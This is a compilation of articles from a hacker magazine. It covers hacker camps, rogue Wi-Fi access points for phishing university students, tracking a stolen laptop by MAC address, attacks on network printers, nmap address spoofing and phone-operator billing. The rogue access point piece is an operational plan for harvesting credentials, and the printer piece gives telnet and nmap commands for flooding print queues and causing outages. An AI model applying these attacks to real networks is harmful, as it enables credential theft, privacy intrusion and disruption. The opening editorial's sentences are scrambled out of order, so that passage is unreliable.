The concept of a hacker camp was first realized in 1993 as Hacking at the End of the Universe (HEU) was held in the Netherlands.THE HACKER DIGEST . held in conjunction with the second HOPE conference (Beyond HOPE). but it was every bit as significant. The Germans held Chaos Communication Camps in 2003 and 2007 while the Dutch held Hacking At Large (HAL) in 2001 and What The Hack in 2005. It was enough to inspire us to move ahead with the first HOPE conference a year later in New York. We’ve gotten used to the Germans having camps and conferences at old military airports or former communist training centers. Another Dutch hacker camp took place four years later in 1997. To have hundreds of hackers occupying a site that once could have been a trigger to the end of the world is both surreal and inspirational. Not only was ToorCamp held in an amazing setting. where everyone is a volunteer and security is relatively seamless and transparent. it was something entirely new. For many others. For a good number of us. For this year also saw something brand new. For the hacker community at large.VOLUME 26
It was another historic summer. the summer of 2009 represented a reaffirmation and a significant expansion into brand new territory. dedicated to the world of hacking and innovation. all kinds of events in the most unlikely of locations can be successfully coordinated. alternated between Germany and the Netherlands during odd years. HOPE conferences in New York were held during even years and alternated with the European hacker camps which. How is it possible to measure up to that level of coolness? This summer. Then. Not to mention contagious. The only way an outdoor hacker conference can possibly work in a place like an old missile silo is if everyone works together and makes sure safety is a
119
. That. of all places. With a little ingenuity and a lot of spirit. was the first American conference to draw over 1. for the first time. the accomplishments mirrored those of previous years. History was made. the German Chaos Computer Club put together the first German hacker camp in 1999. known as Hacking In Progress (HIP). It wasn’t nearly as big as the European counterparts. There. people in our unique community figured out a way to build a mini city in the middle of the wilderness. From that point. a big step was taken in achieving parity. but the sheer amount of responsibility the attendees displayed rivaled that of the overseas conferences. Apart from a
seemingly neverending supply of clever names. The first ever hacker camp in the United States became a reality in early July. we also believed pulling off a hacker camp most certainly would never happen in this country. in turn. Add to that list this year’s presentation of Hacking At Random (HAR). ToorCamp took place in the middle of Washington State at. We’re happy to have been proven very wrong. in turn. the site of a former nuclear missile silo. Just as we once thought it would be impossible to hold a massive hacker conference in the United States. the spirit of these events also seems limitless. complete with power and connectivity.000 attendees.

Oftentimes. coordinating the speaker schedules. Nicola Tesla bills. And those new to the scene must try and learn from the experiences and mistakes of those who’ve been involved in the past. Four full days of talks and gatherings including people from so many different nationalities made it truly impossible to be bored.VOLUME 26
priority in a potentially hazardous environment. subscriptions to 2600 along with back issue collections. At all costs. but the things you can get are as tangible as they come. While this type of magic has started to become almost routine for those of us involved in the hacker community. news coverage. With this accomplished. Now that we know it can be done. cases of Club Mate . Annoying salespeople will never hound you. the camp had both a DECT wireless telephone system and its own GSM network. sometimes in the course of the event itself. managing the actual infrastructure of plumbing and power. and music. plus DVDs from the various Hackers On Planet Earth conferences. the latter turn into the former. we have a whole country of really neat places to hold the next one in. And. dealing with the steady curiosity of the media and the authorities. This is how great things are possible . each allowing attendees to use their phones to call others on site for no charge.with the potential for innovation. we must avoid anything that erects barricades to new participants. A good hacker conference. would still be a form of stagnation. Of course. Yes. This is essential in order for our community to continue to flourish. there is almost no limit to the potential of where the next outdoor hacker event might take place in the States.THE HACKER DIGEST . change. we do need to have this reinforced on a regular basis. Everything from hacker shirts to hacker coffee mugs. The people who run such conferences are very different and separate from those who attend and the hierarchy is painfully evident to all. Why not stop on by?
store. There really seemed to be no end to the innovation and fun that was possible at this event. The time flew by incredibly fast. Naturally. no matter how great it may be. and something completely unexpected and unanticipated. every bit of which was done in a professional and fun manner. we expected greatness from HAR and there was certainly no shortage of that. more new people get involved and become inspired. Having the same people doing the same thing. because it's a digital store. however. many of whom had arrived days before and wound up staying days later to ensure that everything worked out. an event of this nature has a great number of challenges and all of them were tackled by a very dedicated group of people. Let’s hope the inspiration from this event leads to many more of them. even running two separate phone systems. With every one of these milestones. Some people prefer it that way because they don’t really have to do anything except pay their admission fee and follow the instructions. you can stagger in at any hour and make as much noise as you like. A few of the tasks included keeping the wired and wireless connectivity going.and. The kinds of conferences we’ve seen in ToorCamp and HAR (and we’d like to assume our own HOPE conferences) are significantly different from those events that treat their attendees as a mere audience. An FM radio station ran around the clock and captured the spirit of the proceedings with all sorts of interviews. of course.com
120
.
Have You Visited Our Store?
It's not a brick and mortar establishment.2600. has only a slight difference between those organizing the event and those who attend with no previous involvement.

they have access to the network and Internet. First. I will examine the vulnerability. In a corporate environment. their web browser is automatically redirected to a SSL secured splash page where they are required to login to get access to the network. The higher the connection is on the list. Any laptop that has ever connected to the wireless will now have that wireless connection in its wireless profile. The majority of the people living in these apartments are students at the university. the university installed 802. then the laptop will connect to the university’s SSID even if it sees their new wireless router as available. This means that they will connect to the university’s wireless network even when they are not at the university. unsecured SSID. By unsecured. the wireless is set up in a way that allows for rogue access points to be brought onto the network easily. you will find secured access points because the corporation is trying to keep unauthorized persons out of their network. This means that a miscreant can create a rogue access point and everyone will automatically connect to it as though it was owned by the university. Since a lot of university students live in dorms their first year. First. The focus of the paper is explaining how rogue access points can be used in the university environment to exploit students and faculty workstations to gather sensitive data. Even further helping the miscreant is that the laptops bought from the student store list the university’s wireless connection as the preferred connection. A good majority of university students have laptops with the SSID of university saved as
121
.THE HACKER DIGEST . The laptops purchased at the student stores are not the only computers automatically looking for and trying to connect to the university’s unsecured access point. Second. all student laptops (and specifically those bought at the student store). the APs are not secured. This will allow any student who buys one of these laptops easy access onto the university’s wireless network without him/ her having to setup anything. in a university setting. Lastly. There are tons of apartment complexes around my university. then you end up with the vulnerability. One of these settings is adding the university’s wireless network.VOLUME 26
Exploiting University Students using Rogue Access Points
By Anonymous
A rogue access point is a wireless access point that has been installed on a network without permission. if the user connected to the university’s wireless in 2008. Or. When a user connects to the wireless. Once logged in. then every wireless network ever connected to will be in the preferred networks list. Several years ago. it could have a malicious objective like a man-in-the-middle attack where sensitive information could be stolen. my university installed 802. However. There is no client-side software to this login and it is based off of the machine’s MAC/ IP address. Unfortunately.11 APs around the campus. To gather information using a rogue access point. or an enterprise authentication solution. If the user is running Windows and is using Wireless Zero Configuration (WZC). the miscreant has to figure out where students are when not at school. the higher its priority. I will describe the different attack vectors where one could exploit the vulnerability. housing 1000s of people. and in 2009 connected it to their new wireless router at home. My university also sells laptop computers that come customized with common settings and shortcuts that the student would find useful. the probability of having the university’s SSID near the top of their preferred networks list is high.11 wireless access points throughout campus. To allow usability. It could just be an access point that was set up by a student or faculty member to provide wireless access in an area where none existed. Second. All of the access points communicate to the end devices with the same. If you merge the ideas from the last three previous paragraphs. they are trying to provide usability on their wireless so students and faculty can get on it without trouble. A good place to start would be their residence. This means that every laptop purchased from the student stores will automatically be looking for and trying to connect to an unsecured access point. For example. the university moved the authentication from the wireless protocol itself to a web based splash page asking for credentials. I will describe ways to collect sensitive data and how one could use the captured data. The first attack vector is apartment complexes. will be actively looking for the university’s wireless connection. As I mentioned. I mean the access point is not secured with static WEP or WPA keys.

one could easily grab a bunch of users instantly. Go have fun! Shouts to all who have supplied me with the resources to learn
122
. I have no insightful conclusion. the rogue will be found. and actively monitors it. and will never have to hide any of their equipment. there are 100s of laptops looking for the university’s SSID. one now has access to the student’s e-mail. Facebook has a “forgot your password?” page that will send an email to reset your password.VOLUME 26
a wireless profile. the value of the data one could potentially gather might outweigh the risk. one would start by simply sniffing the traffic to determine which websites are being visited the most. at least ones that have any real value. will be sent across SSL. For example. once the signal bleeds off. That’s all. If someone sets up a rogue AP. Simply sniffing the wireless will yield someone who is connected and possibly authenticated to the wireless. Imagine three or four rogue APs each with high gain antennas positioned to pick up the most users. then anyone in proximity will automatically connect to it. Power up your book bag. If he/she captured the credentials for the wireless splash screen. Then. a local web and DNS server running on the laptop could be setup to serve phishing pages matching those sites. by cloning their IP and MAC address. but may arouse suspicion if one doesn’t pass them to a believable error page or if they never get the real website. The number of users who will connect to the rogue AP is based on how high the university’s wireless profile is in the preferred network connections list. but is mobile and has little chance of someone ever finding it. For any captured credentials. My university did not extend the wireless throughout the dormitories. In reality. The longer one leaves the rogue AP on. one could just put the rogue AP in a car and mount the antennas on the roof. Creating a phishing site will guarantee the credentials. if one captures their Facebook password. In terms of believable error pages. This means that above the basement. one is now logged into the wireless as someone else. if the university’s SSID is high in the preferred connections list. The third attack vector is on the campus. If you find a hall where they teach an IT subject. The primary reason for running a rogue at the university is to capture faculty data. the more users that will connect to it. One could create a job that rotates the DNS entries between the IP that points to the phished and real website. I will call this the most effective method because the miscreant will not be seen. This would not provide the depth of coverage as the first method. The downside to this is that if the university is running any kind of rogue AP detection. Again. From there. Pretend you’re a student and go into a large lecture hall. A phished Facebook page throwing the user to the fake maintenance message would be highly effective. Facebook has a habit of going into maintenance mode and only prompting a user that they are in this mode once they try to log in. However. First. then he/she could setup a rogue AP in the ceiling using a laptop by itself. then one might also have their MySpace password. The issue would now be guessing their username. There is a good chance this email will go to the student’s university email address. The reason for the phishing pages is that most credentials. Cron is a job scheduler for Unix/Linux operating systems. The credentials for the wireless are also what the student uses to access their email and other university websites. I mentioned before that wireless access is based off of the laptop’s IP and MAC address. Along the same lines as putting a laptop in the ceiling. This is also the setup where one could have the most equipment. Here is a scenario. After a miscreant has set up the rogue access point. More users will also connect to it when their computer is restarted and looks for available wireless connections. but would be much easier to implement. To get around this problem. If you get to class before they do and get your book bag powered up. The second attack vector is dormitories. Another option is to phish the university’s initial wireless splash page that requires logon. or the combination of a laptop and external AP. The issue of long term power is easily solved. they can start collecting data. but it is hidden from view. one could put it in a book bag wired to a UPS. If a miscreant sets up a rogue AP. Their e-mail address is the gateway to getting passwords to numerous other sites. If the miscreant is brave. there are several things one can do with them. Now that the miscreant has phished some credentials. then it will connect to it if it sees it available. then the majority of the students will bring their laptop. but instead installed APs only in the lobbies and study areas (basements).THE HACKER DIGEST . a cron job could be used. This would only last for a couple hours (depending on how much weight in batteries one wants to deal with). Not only will the AP run forever. there is a chance that the user uses the same password for other sites. and believes that the data he/she wants to collect is on the physical campus. and hope that they connect to you. The first obstacle for the miscreant is getting onto the wireless network so that he/she can serve Internet access and not arouse suspicion. For example. then there will be a high probability they will connect to you because your device will have the best signal strength. All of these new “smart classrooms” have electrical outlets for the projectors above the ceiling tiles.

I felt that it had the coolest feel to it. with a dictionary file or hash file. fire up catchme-ng and click on the “. to find out which cards are best for the job.. or from my house when I wasn’t home. it will be actively sniffing for surrounding APs to suggest them to you. you can list the cards that you have “turned on. When a client probes for a preference AP. Also. it’s most likely the case. and I wouldn’t really care if someone cracked my network security. say. we are simply sniffing. By typing ifconfig. With a cheap wireless card. Usually that turns off all of the network cards in one fell swoop. I too could be trolling in the back of a van. This means that the card has the ability to “sniff” surrounding APs. as they have almost benchmarked every card on the market for their sniffing capabilities! They have a lot of experience with wireless hacking and are first to point out a vulnerability. If your prey (MAC you’re searching for) comes within your wireless card’s sniffing range.. of going into monitor mode. so any old card should do the trick. This is where you can determine if your card is capable. and a box will pop up saying “I’ve found the MAC
123
. you will see it. will either be connected to an AP listed in your preferences. and any other OS that has a network manager-like client running. But again. I don’t own a van. I could possibly do the same thing with MAC addresses and the aircrack-ng suite. as if its life depended on it. Then connect to your wired internet and download the catchme-ng tarball here: http://weaknetlabs. the data sent via WiFi will be visible to anyone in the surrounding area equipped with the proper setup. etc. and search for it! This would.com
Years ago. But I would care if. By this I mean anyone with a card that can be set to “monitor” mode by the user and running airodump-ng while channel hopping. Type iwconfig <cardname> mode monitor to set it to monitor mode.com/ ➥code/catchme-ng/ Now disconnect and save the tarball for future use on a flash drive. a free lightweight coding language. Then select the MAC address you want to hunt for and click start.” button to find your “dump file” created by airodump-ng. searching for a MAC address and not a MIN or ESN (yet). I thought it was a cool movie and have been bashed several times for such a statement. you’re ready to start searching for your cracker/laptop thief! First. the login info using aircrack-ng or cowpatty 4. If you think of this situation with mathematical crime statistics and probability. Windows. and start airodump-ng with the --write to file option. I have had a lot of experience with WiFi cards. with the drivers included in your OS. which would allow you to attempt to crack. Type iwconfig to list all of your wireless cards. Now we want to set our wireless card to monitor mode and turn it back on. or on the side of the laptop box. Once started. I’d suggest changing directories and just saving them in /tmp. and driver issues in the labs here and have found that almost any card that is detected by a Linux/Unix flavor OS can be set into “monitor” mode for sniffing. I had a laptop stolen from me in a mugging. etc.” Then ifconfig ➥ <cardname> down will turn them off temporarily. The part in the movie were Shimomora is in the van searching for Mitnick gave me an idea.0+. But out of all of the cheesy hacker movies. to list them for you to connect to. or code to exploit it. I would first recommend the Remote-Exploit forums. and some patience. But in our case. when I first saw the movie Track Down (Takedown). Put your wireless cards down and kill networkmanager. leave the state. The OS isn’t very embarrassed at this point to cry out! If successful. boot up into a Live Linux disk like WeakNet Linux Assistant. Once you have a good card. turn the card back on with ifconfig <cardname> up. vendor types. of course. but does not always mean it can “inject” fabricated packets. or will be probing for APs in your list. I don’t have friends. for even better evidence. I could then check the MAC address I wrote down of the internal WiFi card. A loud siren sound will play. only going to work if the thief weren’t smart enough to change the card.VOLUME 26
Catching a Laptop Thief/WiFi Hacker
by Douglas Berdeaux douglas@weaknetlabs.THE HACKER DIGEST . You can skim forums where they talk about this sort of thing. I was impressed. I even heard Kevin Mitnick once say that the movie “sucked” in an interview on a radio show. You would want to inject fabricated packets to deauthenticate a user in order to grab a WPA/WPA2 handshake. like wireless security. This can also be accomplished by killing network-manager with killall networkmanager. Make sure you remember what your current working directory is and where you are saving your files to. Now.

IT professionals simply plug the printer in and point computers to it. they only receive instructions to print and therefore do not need these various checks.txt. it would take a bit longer. Modern printers are no longer merely ink cartridges with a network card. access to network storage. of the client that is either “probing” for. Here is an example of such a LAN-nanny:
sudo ettercap -Tpi eth0 // // -k ➥ 1. say. is “run Ettercap.” Now. you can simply write a shell script to frequently check your LAN for new MAC addresses and dump them to a text file. you can now set up nearby and zero in even closer by watching the “PWR” field of airodump-ng. who broke into your network by comparing the logs of MAC addresses with your very own addresses and the foreign address being specified as the “prey. an AP.THE HACKER DIGEST . in nonpromiscuous mode (so there’s not a bunch of packets flooding the screen). A system is returned with ports 515 (Printer/LPD). print every line in 2. ARPs can seriously bog down traffic. 5 or 10 minutes or so. 443 and 23 are open by default. Law enforcement can find the MAC address of a stolen laptop.txt. use text mode. in plain English. If you aren’t sure how to find a MAC address in your logs. print each line in 1. They are ignoring the security implications of treating a printer as a “receive only” device. and email.txt This relies on Ettercap to find the MAC addresses on your LAN.txt | sort -u > MAC_List. and walk/drive/bike around your neighborhood with headphones on in search of your machine.txt | awk ➥ ‘{print $2}’ >> 2. ARP for all clients on LAN and make text file 1. and speed counts when you know that some wireless security measures are flawed when it comes to ARP requests. or connected to. To find one.
Why a printer?
You have scanned your network to find systems with open ports using a tool like Nmap or HPing2 (for this article. And that’s all there is to it. A spot in the visual field in which vision is absent or deficient. of course. Information security is full of scotomas. without creating doubles or overwriting previously seen MAC addresses. You can see the “power. so maybe less often would be recommended. If you find the machine.” Now simply make this run every. Enterprise/business computers have many checks and policies to monitor information coming from and going to them with devices like proxy servers and firewalls. Imagine the possibilities of these applications in parallel.” You can search for anything with a MAC address. You can pinpoint. There are endless possibilities!
Attacking a Blind Spot
by Tim Kulp (cloak13)
scotoma n. do not access the web or even other computers. we will be using Nmap). If we were to use the basic ARP program arp -a.VOLUME 26
specified. These ports are the main PDL (Page
Attack 1: Building your zombie (scanner) army
124
. they are document management systems with large memory stores and direct server access.txt but only the MAC addresses column and append it to 2. on the other hand. This is a good choice because it’s fast. simply toss your laptop into your car/bookbag/etc. A quick browse of the Ricoh or HP printer websites reveals that modern printers are capable of much more than just putting ink on various paper sizes.txt -s q && cat 1. right? Many modern network printers have management features that can be accessed via a web browser or telnet. Printers. Too often.txt && cat
➥ 2. you can own and disrupt a network resource that is critical for most business functionality.txt sorting out the duplicates and spitting all of the unique MAC addresses into the text file MAC_List. with quite good accuracy. Using unsecured network printers. which means that ports 80. look no further than the network printer. which translates to broadcasting data and not just receiving it.txt with results. printers have hard drives. Today. use interface eth0. Another application of the program would be to create a game to with your friends to wirelessly search for them! The program is not biased and you can specify even an ESSID that you once used and have fond memories of. 631 (IPP) and 9100 (Jet Direct) open. really.” or pretty much the range. What the above script actually does.

you can always run: nmap -o [target IP address] The -o modifier tells nmap to determine the operating system of what you are scanning. As printers improve in capabilities and features. With a little scripting skill you can build an automated process that will print random strings. If you are still not sure. our target network printer). This will return the control menu. the port that receives all the PDL commands that we introduced earlier in the article. Using just the address of the printer and telnet. By targeting network printers. type “menu” and hit enter. IP address. when using a zombie scan. 4200. While a zombie scan can be useful. network printers are often forgotten in security audits and analysis. Keep this in mind during your next penetration test project. can cause major disruptions in the printer. subnet mask. you could type the following into the address bar of your web browser: http:// [printer IP address]:9100 Notice we are connecting to port 9100. and a ton of other mischievous things. This type of scan is great for hiding your computer’s identity while still retrieving useful and accurate port information from the target. Using telnet. another system tunnels the requests for you. for “TCP/IP Settings. Each GET would be printed out. blocking business
Conclusion
125
. The IDS/IPS will record the scanning system’s information which. As soon as network administrators realize no one can print to the specific printer. Telnet into the printer using a standard telnet open connection command: open [target printer’s IP address] If the printer is unsecured. If left unsecured. causing a tremendous waste of ink and paper as well as clogging the print queue and thus preventing other users from being able to print.” then select option 1. PDL is the command language network printers use to know how to draw the document that they are trying to print. you can change settings on an unsecured printer by connecting to port 23.
Attack 2: Killing trees. But wasting paper is not the only DoS we can perform. you will not be prompted for a username or password. or of a printer tied directly to the company’s Exchange server. but for this attack we are only delivering a scan through our printer. This will cause the printer to print the text that you typed before hitting Ctrl-]. the changed IP address will be discovered and corrected. This particular scan is useful when you know an IDS or IPS system will be logging scan activities.s operations or be other routes to a DoS attack. Using telnet and an unsecured printer. you can do a lot more with an unsecured printer. for “Main TCP/IP Settings. To get the hostname. then you can expect something like “HP LaserJet 4050/4200/4600/5100 (JetDirect) printer. 4600 or 5100 model. we are going to launch a DoS attack. We will walk through a quick scenario that will get the printer’s hostname using telnet and an unsecured HP 4050n printer. what kind of attacks could be used to compromise the connected systems? Like many non-computer devices. Many of these settings. select option 2. You can change the IP address here to create a simple. This connection will cause the printer to spit out an HTTP request. If the device is indeed a printer. The few examples in this article are simple attacks for standard network printers but can be used as a basis for more sophisticated attacks against robust printing systems. again causing the print queue to be flooded with bogus print requests. you can craft your own HTTP commands and flood the printer with HTTP GET requests. Letís get this printer working for us. Return to the main menu and browse the other options to get a complete picture of all the settings you can manipulate. Using the following command in nmap: nmap -sI [printer IP address] [target IP address] The printer (now our zombie system) will scan the target for port information. If you get creative with a tool like Fiddler. Another way to do this same attack is to connect to the printer via a web browser. but temporary. Whether or not the printer will then be secured is another story. you can send print jobs to the network printer. will be the zombie device (in this case. Imagine the security concerns of a “document management solution” printer. you can leverage a powerful network resource while operating in a very large security blind spot. DoS attack. while you are executing the scan. Type whatever you would like and press Crtl-] to send the command to the printer. As an example. Having these ports open is a sure indicator that the device is a network printer...” This will return all of the general TCP/ IP settings. This is called an idle scan or a zombie scan because. Connect to the printer via telnet: open [target IP address]:9100 This will open a telnet connection to port 9100. change the user time out. new security issues arise. including hostname. This is great information to start looking for vulnerabilities. etc. with slight changes.” which tells you that the network printer in question is an HP LaserJet and could be a 4050. After gaining access to the printer. You can use this connection to reset the Administrative Password.THE HACKER DIGEST .VOLUME 26
Description Language) data stream ports.

no matter what OS you’re running. you can run Nmap on it. Solaris.24. because that IP that is scanning you is probably not the IP that you think it is. there are two arguments that I will go into in more depth: -S and -D.634 seconds
This is just to show you what I typed at the command prompt. Anyway.
Jan 15 00:13:01 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥78:18:c6:08:00 SRC=12. so you can see how to use the -S argument and what to expect as possible results. Mac OS X. While they give System and Network administrators the ability to scan for unwanted holes in their firewalls. and computers.1.decoy2[.ME].168.27
Starting Nmap 4. If you do use “ME. And this is for educational purposes only.168...VOLUME 26
by Bryce Verdier
For people in the know. as Nmap likes to ping before scanning to make sure the host is online.1.168. but I’ve decided to use it here to be explicit.) For those who don’t know. This is a real good way to make the network administrators very angry. Nmap runs on Linux. but maybe you do. One of the most well known port scanners is Nmap.. (If you’re not.36. Disclaimer: Just because you’re about to learn a new tool today..48 DST=192. they also give malicious Internet users the ability to do the same thing and are usually the first tool a would-be intruder uses to find a way into a network. get permission.” And -D is described as.27) are filtered MAC Address: 00:14:BF:5B:2D:5C ➥ (Cisco-Linksys) Too many fingerprints match this ➥ host to give specific OS details Network Distance: 1 hop Nmap finished: 1 IP address (1 host ➥ up) scanned in 36. does not mean that you should go straight to work or school and just start scanning every computer in sight. So chances are that. From the manual.>: Cloak a scan with decoys” (notice no space between the comma decoy1 and decoy2).24..36. or decoys. I do not know if you would want to do this. Generally. -S has the explanation of.1. However. As I said above. “-S <IP_Address>: Spoof source address. I have a couple more arguments thrown in for good measure. then I would recommend you spend some time with it before continuing with this article.” you will put in your computer’s IP address as part of the cycle of decoys. or not. First the “-e” this is telling Nmap which network card to use.36.168.THE HACKER DIGEST . Nmap knows which card to use. and more. if you do not own the computer you’re about to scan.168. as the manual calls them.24. Nmap has the ability to change its scanning IP. So for everyone who lives by their firewall logs. Windows.48 -A -T4 192.1. obviously. servers.1. So be courteous. Now that we’ve gone over the boring stuff. and do the same trick with a group of IPs. you might want to start keeping a closer look at your logs concerning port scans. The next extra argument is “-P0.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=40 ➥ ID=63097 PROTO=TCP SPT=43468 DPT=1383 WINDOW=1024 ➥ RES=0x00 SYN URGP=0 Jan 15 00:13:01 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥ 78:18:c6:08:00 SRC=12. port scanners are double-edged swords. “-D <decoy1. If you look in the screen shot on each line you’ll
126
.” This is to tell Nmap not to ping the host.62 ( http://nmap. FreeBSD. I am quite sure that some of the people reading this article are more adept with this tool than I am.24.48.48 DST=192.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=47 ➥ ID=56142 PROTO=TCP SPT=43469 DPT=722 WINDOW=4096 ➥ RES=0x00 SYN URGP=0
This output shows the results the command above has on my iptables firewall log. let’s look at some firewall logs. which I have set to spoof as 12. -S is to spoof the IP address of the hosting machine. let’s see some of these configurations in action:
$ sudo nmap -e eth0 -P0 -S ➥ 12.36.27 will be ➥ MUCH less reliable because we did not find at least ➥ 1 open and 1 closed TCP port All 1697 scanned ports on mythbox ➥ (192. ➥ org ) at 2009-01-15 00:13 PST Warning: OS detection for ➥ 192.

2. 1. well.1. NY or order online .12 DST=192. You can discover this for yourself by looking at the log messages and noticing what SRC equals.48 DST=192. Available in all sizes.html
Just like the first command. and that you can use an array of IP address to pretend to be other IPs while scanning.27): Not shown: 1693 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1. So you might be wondering at this point why I say we almost hid our identity.com 11953
Check Out Our Newest Shirt
127
.24.VOLUME 26
see: “SRC=12.250.X OS details: Linux 2.1.168.3.12 (x86) Uptime: 0. the firewall logs show that access was attempted from our specified address above. we start by Nmap telling it which network card to use and. but it's also an educational tool that will show you the many ways your phone calls can be overheard.1.36. Of course.48.org/nmap/man/man➥bypass-firewalls-ids.9 ➥ . We learned how to change your IP address while scanning. ➥org/nmap/man/man-performance.6.168. and 5.1. this can be changed as well. PO Box 752. Middle Island.org/nmap/man/man➥port-scanning-basics. Just like the manual said.24. ➥html 3. Now let’s take a quick look at our iptables log and see what happens.6.9. but what about multiple IP addresses?
$ sudo nmap -e eth0 -P0 -D 1 ➥ 2.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=42 ➥ ID=16809 PROTO=TCP SPT=63815 DPT=234 WINDOW=3072 ➥ RES=0x00 SYN URGP=0
Well. Nmap website: http://www. So let’s recap what we have (hopefully) learned today. ➥insecure.org ➥ ) at 2009-02-15 00:33 PST Warning: OS detection for ➥ 192.25.1.1. 3.
2600.html 4.1 ➥ 25. ➥insecure.6.6.9.250 -A -T4 192.24.12. if you have been paying attention to the firewall logs you might have noticed that the attacking MAC address has stayed the same.27 Starting Nmap 4.5.4. we specify three IP addresses: 12. in the exact order that we inputted them.15 631/tcp open ipp CUPS 1.org/nmap/ 2.168. Performance: http://www.48. ➥insecure.168.36. well.48” which is the exact IP we set from the command line.9.store.250 DST=192. We know this works with a single IP address.THE HACKER DIGEST .
Jan 15 00:33:54 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4: ➥ 78:18:c6:08:00 SRC=12.24. Full color diagram on the front with explanation on the back. Well.2600.125. Address Spoofing: http://www.657 seconds
➥ IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4 ➥:78:18:c6:08:00 SRC=3. instead of just specifying one IP address.6.25.12.031 days (since ➥ Wed Jun 13 20:11:22 2007) Network Distance: 1 hop Nmap finished: 1 IP address (1 host ➥ up) scanned in 138.2 6543/tcp open mythtv? 6544/tcp open mythtv? MAC Address: 00:14:BF:5B:2D:5C ➥ (Cisco-Linksys) Device type: general purpose Running: Linux 2. $20.25.36.168.168.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=42 ➥ ID=16809 PROTO=TCP SPT=63815 DPT=234 WINDOW=3072 ➥ RES=0x00 SYN URGP=0 Jan 15 00:33:54 mythbox IN=eth0 OUT= MAC=00:14:bf:5b:2d:5c:00:13:d4:7 ➥8:18:c6:08:00 SRC=5.62 ( http://nmap.27 will be ➥ MUCH less reliable because we did not find at least ➥ 1 open and 1 closed TCP port Interesting ports on ➥ mythbox (192. Port Scanning Basics: http://www.6.125.insecure. but that is another article for another time.36.27 LEN=44 TOS=0x00 ➥ PREC=0x00 TTL=43 ➥ ID=16809 PROTO=TCP SPT=63815 DPT=234 WINDOW=4096 ➥ RES=0x00 SYN URGP=0 Jan 155 00:33:54 mythbox
Resources
Do you have one of the new 2600 shirts yet? Not only is it a piece of clothing that will shelter you from the elements.

Telkom in South Africa. Third Number: You can bill someone else’s phone number for a call you want to make. it’s very unusual for many types of operator handled calls to be made these days. which means the skies have returned to their usual leaden gray. you must decide how to pay: Calling Number: You can bill the phone number from which you’re calling . special delivery. Speaking of calling overseas. BT in the UK. Younger readers growing up in the world of unlimited cell phone plans and unlimited long distance may not even know what a collect call is. a hefty surcharge is collected for this service. station-to-station rates can also apply to calls with special billing arrangements or where “time and charges” is requested. but I like his parents. you can call anywhere in the world as long as they agree to pay the charges. he’s too busy cashing unemployment checks and watching Jerry Springer to do any actual work. you took a big financial risk by calling station-to-station. These can be used all over the world to charge calls to your home telephone bill . Collect: When you make a collect call. for which calls are billed directly rather than being billed through your telephone company. there are still a healthy number of collect calls in the mix. I’m not a big fan of my neighbor. If the person you were trying to reach wasn’t there. Operator dialed station-to-station calls are generally handled for visually impaired or disabled customers.) and vice-versa. Note that long distance carriers can bill ILEC calling cards. or how to use other types of operator handled calls. it’s free to you. It also means leaves from my no-good. Person to Person: When long distance calls were very expensive (particularly international long distance calls). the operator takes the name of the person you are attempting to reach and will try to contact that person directly. you’d still have to pay for the call. All billing for operator-handled calls is either based on a station-to-station or person-toperson call: Station to Station: This is the same billing as just dialing 1+ (NPA) NXX-XXXX direct. You are only connected (and charged for the call) if the operator can reach your party. Once you decide the type of call you want to make (assumed to be station-to-station if you don’t specify otherwise). operators only dial station-to-station calls for ordinary customers when they report trouble on the line. However. All this fuming got me to thinking what would happen if my deadbeat neighbor’s line is disconnected for nonpayment. but you can have an operator dial the call for you. etc. today’s collect calling rates range from high to completely outrageous. These are different than calling cards issued by long distance carriers. However. I’m thinking of returning this week’s batch of leaves in his mailbox.S.generally at outrageous rates. Believe it or not. In a world where long distance calling is effectively free. the following operator handled call types are still available from AT&T long distance operators and from local ILEC phone company operators (although you may have trouble finding an operator who actually knows how to place them). it’s possible to call phone numbers in the U. You wouldn’t believe how often people will agree
128
.THE HACKER DIGEST . With a person-to-person call. and extra charges are waived for such customers. However. with a few extra copies of his overdue phone bill and maybe a rotting salmon carcass for good measure. and surcharges are also waived in such instances. some COCOTS allow this too! Calling Card: The ILECs and many independent phone companies issue calling cards. In general. Of course. He’ll probably be reduced to calling his parents collect to beg them for money. this is called a “reverse charge” call. Although 97 percent of collect calls are from prisons and jails. After all. In fact. the person you are calling must agree to pay the charges. This billing method is often used by PBX and VMB phreaks. Overseas. and greetings from the Central Office! It’s autumn in Puget Sound country. And as it turns out. and I’d hate for them to be stuck with a whopper of a bill.provided it’s not blocked. collect using the dominant fixed line carrier (such as NTT in Japan. lazy unemployed neighbor’s trees are covering my lawn.VOLUME 26
Telecom Informer
by The Prophet
Hello. unlike in the good old days of the Bell System where rates were high but at least consistent. but it doesn’t work the other way around. but someone else answered the phone.

so OCI was frequently exploited by phreaks in the early 1990s. billed to a third number. I’ll see you again in the winter. keep our operators busy making person-to-person third party billed calls with time and charges!
129
. After the call is completed. $4. I’m out of space in this column. If charges are disputed by the third party. Well. • 1-800-COLLECT: Operated by Verizon. an operator can break in and interrupt a call in progress. AT&T will back-charge the originating number. If someone at that number accepts the charges. OCI was one of the first carriers in this market. 55 cent additional payphone surcharge. given the number of disconnect orders I’m processing on a daily basis. you’ll be asked to pay another way. available services may vary.29 per minute plus 12. This is at the discretion of the carrier and generally depends upon the type of phone you’re calling from. you will more likely than not be connected to an “alternative operator service” or AOS. Third-party billed calls are not always verified before they are connected. You’ll hear a “bong” tone. But I digress.99-$6. When you follow the standard procedure to place a “0+” call.THE HACKER DIGEST . if you’re calling from a home telephone or business line. Here are some example rates for a collect call: • 1-800-ONE-DIME: Operated by Sprint. The ability to call cellular phones collect is a relatively new development. The charge is a flat $9. Sprint. Otherwise. allows billing to cell phones (excluding Verizon and Alltel). • 1-800-CALL-ATT: This service allows collect calls to prepaid and post-paid cell phones from AT&T. Busy Line Verification: An operator can verify that a line that rings busy is actually busy (not just off hook). it’s paradoxically more expensive: there is a $7. However. To accomplish this. shady AOS practices continue.99 surcharge. The operator will not connect your call to the existing call in progress. charging very high rates to consumers and paying fat commissions to owners of payphones choosing their services. Their operator service platform was poorly designed and their operators were poorly trained. and most CLECs and 